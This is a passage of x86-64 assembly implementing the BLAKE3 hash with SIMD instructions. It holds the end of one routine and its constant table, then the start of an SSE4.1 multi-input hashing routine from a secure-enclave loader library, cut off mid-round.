vpshufd xmm4, xmm8, 0x39
vshufps xmm8, xmm6, xmm7, 250
vpblendd xmm9, xmm9, xmm8, 0xAA
vpunpcklqdq xmm8, xmm7, xmm5
vpblendd xmm8, xmm8, xmm6, 0x88
vpshufd xmm8, xmm8, 0x78
vpunpckhdq xmm5, xmm5, xmm7
vpunpckldq xmm6, xmm6, xmm5
vpshufd xmm7, xmm6, 0x1E
vmovdqa xmm5, xmm9
vmovdqa xmm6, xmm8
jmp 9b
9:
vpxor xmm0, xmm0, xmm2
vpxor xmm1, xmm1, xmm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
jmp 4b
#ifdef __APPLE__
.static_data
#else
.section .rodata
#endif
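// Read-only constants: counter-increment vectors, broadcast IV words, the
// block length, byte-shuffle masks implementing the 16- and 8-bit rotates,
// and the MSB-flip mask used for the unsigned counter-carry compare.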
.p2align 6
ADD0:
.long 0, 1, 2, 3, 4, 5, 6, 7
ADD1:
.long 8, 8, 8, 8, 8, 8, 8, 8
BLAKE3_IV_0:
.long 0x6A09E667, 0x6A09E667, 0x6A09E667, 0x6A09E667
.long 0x6A09E667, 0x6A09E667, 0x6A09E667, 0x6A09E667
BLAKE3_IV_1:
.long 0xBB67AE85, 0xBB67AE85, 0xBB67AE85, 0xBB67AE85
.long 0xBB67AE85, 0xBB67AE85, 0xBB67AE85, 0xBB67AE85
BLAKE3_IV_2:
.long 0x3C6EF372, 0x3C6EF372, 0x3C6EF372, 0x3C6EF372
.long 0x3C6EF372, 0x3C6EF372, 0x3C6EF372, 0x3C6EF372
BLAKE3_IV_3:
.long 0xA54FF53A, 0xA54FF53A, 0xA54FF53A, 0xA54FF53A
.long 0xA54FF53A, 0xA54FF53A, 0xA54FF53A, 0xA54FF53A
BLAKE3_BLOCK_LEN:
.long 0x00000040, 0x00000040, 0x00000040, 0x00000040
.long 0x00000040, 0x00000040, 0x00000040, 0x00000040
ROT16:
.byte 2, 3, 0, 1, 6, 7, 4, 5, 10, 11, 8, 9, 14, 15, 12, 13
ROT8:
.byte 1, 2, 3, 0, 5, 6, 7, 4, 9, 10, 11, 8, 13, 14, 15, 12
CMP_MSB_MASK:
.long 0x80000000, 0x80000000, 0x80000000, 0x80000000
.long 0x80000000, 0x80000000, 0x80000000, 0x80000000
BLAKE3_IV:
.long 0x6A09E667, 0xBB67AE85, 0x3C6EF372, 0xA54FF53A
|
mit-enclaves/argos-monitor | 61,143 | C/libraries/sdktyche/loader/blake3_sse41_x86-64_unix.S | #if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",%progbits
#endif
#if defined(__ELF__) && defined(__CET__) && defined(__has_include)
#if __has_include(<cet.h>)
#include <cet.h>
#endif
#endif
#if !defined(_CET_ENDBR)
#define _CET_ENDBR
#endif
.intel_syntax noprefix
.global blake3_hash_many_sse41
.global _blake3_hash_many_sse41
.global blake3_compress_in_place_sse41
.global _blake3_compress_in_place_sse41
.global blake3_compress_xof_sse41
.global _blake3_compress_xof_sse41
#ifdef __APPLE__
.text
#else
.section .text
#endif
.p2align 6
_blake3_hash_many_sse41:
blake3_hash_many_sse41:
_CET_ENDBR
push r15
push r14
push r13
push r12
push rbx
push rbp
mov rbp, rsp
sub rsp, 360
and rsp, 0xFFFFFFFFFFFFFFC0
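// Build the per-lane counter vectors: counter + {0,1,2,3} in the low words
// when counter incrementing is enabled (r9d), with the unsigned carry
// propagated into the high words via the MSB-flip signed-compare trick.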
neg r9d
movd xmm0, r9d
pshufd xmm0, xmm0, 0x00
movdqa xmmword ptr [rsp+0x130], xmm0
movdqa xmm1, xmm0
pand xmm1, xmmword ptr [ADD0+rip]
pand xmm0, xmmword ptr [ADD1+rip]
movdqa xmmword ptr [rsp+0x150], xmm0
movd xmm0, r8d
pshufd xmm0, xmm0, 0x00
paddd xmm0, xmm1
movdqa xmmword ptr [rsp+0x110], xmm0
pxor xmm0, xmmword ptr [CMP_MSB_MASK+rip]
pxor xmm1, xmmword ptr [CMP_MSB_MASK+rip]
pcmpgtd xmm1, xmm0
shr r8, 32
movd xmm2, r8d
pshufd xmm2, xmm2, 0x00
psubd xmm2, xmm1
movdqa xmmword ptr [rsp+0x120], xmm2
mov rbx, qword ptr [rbp+0x50]
mov r15, rdx
shl r15, 6
movzx r13d, byte ptr [rbp+0x38]
movzx r12d, byte ptr [rbp+0x48]
cmp rsi, 4
jc 3f
2:
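// Main 4-input loop: broadcast each of the eight key words across a register,
// giving one transposed state row per xmm (xmm0-7 = h0..h7 in all four lanes).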
movdqu xmm3, xmmword ptr [rcx]
pshufd xmm0, xmm3, 0x00
pshufd xmm1, xmm3, 0x55
pshufd xmm2, xmm3, 0xAA
pshufd xmm3, xmm3, 0xFF
movdqu xmm7, xmmword ptr [rcx+0x10]
pshufd xmm4, xmm7, 0x00
pshufd xmm5, xmm7, 0x55
pshufd xmm6, xmm7, 0xAA
pshufd xmm7, xmm7, 0xFF
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
9:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
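// Load 16 message words from each of the four inputs and transpose 4x4, so
// each xmm holds one message-word index across all four lanes.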
movdqu xmm8, xmmword ptr [r8+rdx-0x40]
movdqu xmm9, xmmword ptr [r9+rdx-0x40]
movdqu xmm10, xmmword ptr [r10+rdx-0x40]
movdqu xmm11, xmmword ptr [r11+rdx-0x40]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp], xmm8
movdqa xmmword ptr [rsp+0x10], xmm9
movdqa xmmword ptr [rsp+0x20], xmm12
movdqa xmmword ptr [rsp+0x30], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x30]
movdqu xmm9, xmmword ptr [r9+rdx-0x30]
movdqu xmm10, xmmword ptr [r10+rdx-0x30]
movdqu xmm11, xmmword ptr [r11+rdx-0x30]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0x40], xmm8
movdqa xmmword ptr [rsp+0x50], xmm9
movdqa xmmword ptr [rsp+0x60], xmm12
movdqa xmmword ptr [rsp+0x70], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x20]
movdqu xmm9, xmmword ptr [r9+rdx-0x20]
movdqu xmm10, xmmword ptr [r10+rdx-0x20]
movdqu xmm11, xmmword ptr [r11+rdx-0x20]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0x80], xmm8
movdqa xmmword ptr [rsp+0x90], xmm9
movdqa xmmword ptr [rsp+0xA0], xmm12
movdqa xmmword ptr [rsp+0xB0], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x10]
movdqu xmm9, xmmword ptr [r9+rdx-0x10]
movdqu xmm10, xmmword ptr [r10+rdx-0x10]
movdqu xmm11, xmmword ptr [r11+rdx-0x10]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0xC0], xmm8
movdqa xmmword ptr [rsp+0xD0], xmm9
movdqa xmmword ptr [rsp+0xE0], xmm12
movdqa xmmword ptr [rsp+0xF0], xmm13
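// Rows 2-3 of the transposed state: broadcast IV words, per-lane counters,
// block length, and the block flags in eax; xmm8 (IV0) is materialized at its
// first use below and spilled to [rsp+0x100] between uses.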
movdqa xmm9, xmmword ptr [BLAKE3_IV_1+rip]
movdqa xmm10, xmmword ptr [BLAKE3_IV_2+rip]
movdqa xmm11, xmmword ptr [BLAKE3_IV_3+rip]
movdqa xmm12, xmmword ptr [rsp+0x110]
movdqa xmm13, xmmword ptr [rsp+0x120]
movdqa xmm14, xmmword ptr [BLAKE3_BLOCK_LEN+rip]
movd xmm15, eax
pshufd xmm15, xmm15, 0x00
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
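// Seven rounds, fully unrolled, with the message schedule folded into the
// [rsp+...] load offsets; each round does four column G steps then four
// diagonal G steps, the diagonal expressed by rotating the register roles.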
paddd xmm0, xmmword ptr [rsp]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x40]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [BLAKE3_IV_0+rip]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x10]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x50]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x80]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0xC0]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x90]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0xD0]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x20]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x70]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x60]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x10]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x90]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xB0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0xE0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x30]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0xD0]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x40]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x20]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x60]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0xB0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x50]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0xF0]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xA0]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0xE0]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x70]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0x30]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x40]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0x50]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x80]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xC0]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0xF0]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm4
